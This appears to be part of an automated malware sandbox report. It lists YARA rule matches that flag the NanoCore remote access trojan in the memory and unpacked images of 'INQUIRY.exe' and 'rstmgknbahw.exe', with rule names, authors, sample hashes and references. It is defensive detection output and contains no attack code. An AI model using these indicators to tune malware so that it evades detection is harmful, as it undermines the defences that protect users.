      Source: 00000002.00000000.663644960.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000004.00000002.724570206.00000000006C5000.00000004.00000020.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000004.00000002.724570206.00000000006C5000.00000004.00000020.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000006.00000000.718272419.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000006.00000000.718272419.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000004.00000000.702725030.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000004.00000000.702725030.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000004.00000002.725281266.00000000049D2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000004.00000002.725281266.00000000049D2000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000002.918375056.00000000024E0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000002.00000002.918375056.00000000024E0000.00000004.00020000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: INQUIRY.exe PID: 6904, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: Process Memory Space: INQUIRY.exe PID: 6904, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: INQUIRY.exe PID: 7084, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: Process Memory Space: INQUIRY.exe PID: 7084, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: rstmgknbahw.exe PID: 1904, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: Process Memory Space: rstmgknbahw.exe PID: 1904, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: rstmgknbahw.exe PID: 5320, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: Process Memory Space: rstmgknbahw.exe PID: 5320, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: INQUIRY.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: 6.0.rstmgknbahw.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 6.0.rstmgknbahw.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.0.rstmgknbahw.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 6.2.rstmgknbahw.exe.37a3258.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 6.2.rstmgknbahw.exe.37a3258.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.2.rstmgknbahw.exe.37a3258.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 6.0.rstmgknbahw.exe.415058.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 6.0.rstmgknbahw.exe.415058.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.0.rstmgknbahw.exe.415058.10.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 5.2.rstmgknbahw.exe.2411458.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 5.2.rstmgknbahw.exe.2411458.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5.2.rstmgknbahw.exe.2411458.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 4.0.rstmgknbahw.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 4.0.rstmgknbahw.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.2.rstmgknbahw.exe.3820e14.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 6.2.rstmgknbahw.exe.3820e14.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 4.1.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 4.1.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.0.rstmgknbahw.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 6.0.rstmgknbahw.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 4.0.rstmgknbahw.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 4.0.rstmgknbahw.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.0.rstmgknbahw.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 4.0.rstmgknbahw.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 4.2.rstmgknbahw.exe.6d8d50.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 4.2.rstmgknbahw.exe.6d8d50.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 4.0.rstmgknbahw.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 6.0.rstmgknbahw.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 6.0.rstmgknbahw.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 4.2.rstmgknbahw.exe.6d8d50.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 6.0.rstmgknbahw.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 4.1.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.0.INQUIRY.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.0.INQUIRY.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.0.INQUIRY.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 3.2.rstmgknbahw.exe.2300000.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 3.2.rstmgknbahw.exe.2300000.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.rstmgknbahw.exe.2300000.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.0.INQUIRY.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.0.INQUIRY.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.0.INQUIRY.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 6.2.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 6.2.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.2.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 6.0.rstmgknbahw.exe.415058.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 6.0.rstmgknbahw.exe.415058.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.0.rstmgknbahw.exe.415058.10.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 4.2.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 4.2.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 4.2.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 6.0.rstmgknbahw.exe.415058.12.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 6.0.rstmgknbahw.exe.415058.12.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.0.rstmgknbahw.exe.415058.12.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 6.2.rstmgknbahw.exe.382543d.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 6.2.rstmgknbahw.exe.382543d.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.0.INQUIRY.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.0.INQUIRY.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.0.INQUIRY.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.0.INQUIRY.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.0.INQUIRY.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.0.INQUIRY.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 6.0.rstmgknbahw.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 6.0.rstmgknbahw.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.0.rstmgknbahw.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 3.2.rstmgknbahw.exe.2311458.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 3.2.rstmgknbahw.exe.2311458.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.rstmgknbahw.exe.2311458.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 4.2.rstmgknbahw.exe.2510000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 4.2.rstmgknbahw.exe.2510000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 4.2.rstmgknbahw.exe.2510000.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 4.2.rstmgknbahw.exe.3950e14.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 4.2.rstmgknbahw.exe.3950e14.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
